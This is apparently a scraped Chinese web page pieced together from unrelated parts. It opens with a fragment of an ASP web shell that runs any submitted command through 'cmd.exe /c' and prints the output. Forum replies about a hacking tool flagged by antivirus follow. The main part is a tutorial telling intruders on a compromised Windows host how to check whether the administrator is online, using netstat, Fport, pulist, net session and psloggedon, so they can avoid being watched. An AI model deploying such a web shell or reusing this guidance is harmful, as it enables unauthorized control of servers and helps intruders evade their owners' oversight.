' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

End If

%>
<HTML>
<BODY>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</form>
<PRE>

<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

 

 

 

前辈我好佩服你啊,只是我安了流光,瑞星查出病毒 可靠么??

 
前辈我好佩服你啊,只是我安了

 

前辈我好佩服你啊,只是我安了流光,瑞星查出病毒 可靠么??

 
 
 
有些杀毒软件会把黑客工具当成

 

有些杀毒软件会把黑客工具当成病毒的 

 

如 何 判定管理员是否在线

随着网络黑客工具的简单化和傻瓜化,越来越多的网络爱好者可以通过现成的攻击工具轻松的入侵主机,然而谁也不想在管理员的眼皮底下做入侵,所以在入侵成功以后,一个很重要的事情是:你能不能确认你的行为在别人的监视之下?所以我们首先要知道管理员是不是现在正在你入侵的主机上?
 如何判定管理员在线,我们要知道的是管理员是通过什么方式管理主机的:是pcanywhere、vnc、DameWar、终端服务、ipc、telnet还是本地登陆···

 一、对于用第三方的控屏工具(pcanywhere、vnc、DameWar等),你只要看相应端口有没有状态为“ESTABLISHED”的连接。一个netstat -an就可以知道,如果想查看与端口相关的进程,使用Fport.exe就可以了。比如我们在一台主机上使用netstat -an发现如下的信息:
Active Connections

Proto  Local Address          Foreign Address        State

TCP    lin:1755               lin:telnet             ESTABLISHED
TCP    lin:1756               lin:netbios-ssn        ESTABLISHED
TCP    lin:1758               202.103.243.105:http   TIME_WAIT
TCP    lin:1764               202.103.243.105:http   TIME_WAIT
TCP    lin:6129               lin:1751               ESTABLISHED

使用Fport.exe得到如下的信息:
Pid   Process            Port  Proto Path

528   mysqld-nt      ->  3306  TCP   D:\mysql\bin\mysqld-nt.exe
1328  DWRCS          ->  6129  TCP   C:\WINNT\SYSTEM32\DWRCS.EXE   ---这个是DameWare Mini Remote Control服务

8     System         ->  138   UDP
248   lsass          ->  500   UDP   C:\WINNT\system32\lsass.exe


------从这个可以看出,管理员是通过DameWare Mini Remote Control来管理现在的主机,连接的端口是6129。同样如果管理员使用其他的控屏工具,比如pcanywhere、vnc我们也是可以通过netstat -an查看端口连接的情况。

 

  二、对于从本地或终端服务登陆的,看看有几个winlogon进程,我们可以使用的工具是PSTOOLS的PULIST.EXE,它能够查看本机的所用正在运行的进程。然后单凭有几个winlogon进程也很难判定在线的是不是管理员,因为一般用户和管理员都是通过图形界面登陆的,身份验证都是在GINA(GINA - Graphical Identification andAuthentication图形标识和身份验证)中进行,而GINA又和Winlogon进程紧密相关,所以查看有几个winlogon进程只能知道当前有几个用户登陆主机。这个办法也是给一个参考而已吧,给一个例子,这样应该好理解一点:
在主机上运行pulist.exe(至于如何才能在主机上运行pulist.exe,我想这个问题也不用说了吧),进程情况:
PID     Path
0       [Idle Process]
8       [System]
160     \SystemRoot\System32\smss.exe
184     \??\C:\WINNT\system32\csrss.exe
208     \??\C:\WINNT\system32\winlogon.exe                          ----这个
680     C:\WINNT\System32\svchost.exe
404     C:\WINNT\Explorer.EXE
1088    \??\C:\WINNT\system32\csrss.exe
1084    \??\C:\WINNT\system32\winlogon.exe                          ----还有这个

 

 

在这个上面我们发现了有二个的winlogon.exe,就可以知道目前有2个用户通过本地或终端服务登陆主机,结合上面说的判定方法,使用netstat 查看TCP端口连接:

Num  LocalIP           Port    RemoteIP          PORT    Status

10   192.168.0.1       3389    192.168.2.1       1071    Established      ----终端的

可以看出使用的是终端3389连接。

  三、对于用telnet登陆的,telnet的登陆不是通过winlogon来管理的,还是看相应端口的连接吧,我们知道的是一般情况下telnet使用23端口连接,通过netstat -an可能很清楚的看出23端口有没有打开:
C:\>netstat -an

Active Connections

Proto  Local Address          Foreign Address        State

TCP    127.0.0.1:23           127.0.0.1:1030         ESTABLISHED
TCP    127.0.0.1:1030         127.0.0.1:23           ESTABLISHED
我们也可以通过上面的方法查看相应的进程,比如我们使用FPORT.EXE是得到如下的信息:
E:\HACK>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid   Process            Port  Proto Path
660   inetinfo       ->  21    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
1112  tlntsvr        ->  23    TCP   C:\WINNT\system32\tlntsvr.exe
660   inetinfo       ->  80    TCP   C:\WINNT\System32\inetsrv\inetinfo.exe
416   svchost        ->  135   TCP   C:\WINNT\system32\svchost.exe
660   inetinfo       ->  443   TCP     C:\WINNT\System32\inetsrv\inetinfo.exe
8     System         ->  1028  TCP
408   telnet         ->  1030  TCP   C:\WINNT\system32\telnet.exe

从上面的信息可以知道23端口对应的正是telnet服务tlntsvr.exe。


  四、通过IPC$管道进行管理,这个可以通过WINDOWS NT系统内置的工具NET SESSION,它的作用是列出或断开连接本地计算机和与它连接的客户之间的会话。
下面给出一个结果:
E:\HACK>net session

计算机               用户名            客户类型      打开空闲时间

-------------------------------------------------------------------------------
\\LIN                  LINYUN               Windows 2000 2195     0 00:08:47

命令成功完成。

从这个上面我们就可以看出当前有一个用户名为LIYUN的用户登陆主机LIN。在这里给大家推荐一个比较好的工具——PSTOOLS里面的psloggedon.exe,它不仅能列出使用IPC$登陆的用户,而且能列出本地登陆的用户。
E:\Pstools\Pstools>psloggedon.exe

 

Users logged on locally:
   2003-9-15 14:33:38    LIN\Administrator -----这个是本地登陆的用户administrator

Users logged on via resource shares:
   2003-9-15 14:41:04    LIN\LINYUN -----这个是使用IPC$连接的用户LINYUN

  如何判定管理员是否在线是一个比较深入的话题,上面说的仅仅是提供一个思路,当然了,如果管理员登陆了,却锁定了主机,或者正在运行屏幕保护程序,这一些就都不好说了!有矛必有盾,我们既然能通过各种的方式判定管理员是不是在线,同样,管理员也能通过这样的途径知道自己是否被入侵,从而尽快的查出入侵者,所以请广大的网络爱好者不要以身试法,入侵国内主机。


 
 
    
 

 




请用手机微信扫一扫关注海中官方微信平台:


收藏 推荐 打印 | 录入:zhourz | 阅读:
相关新闻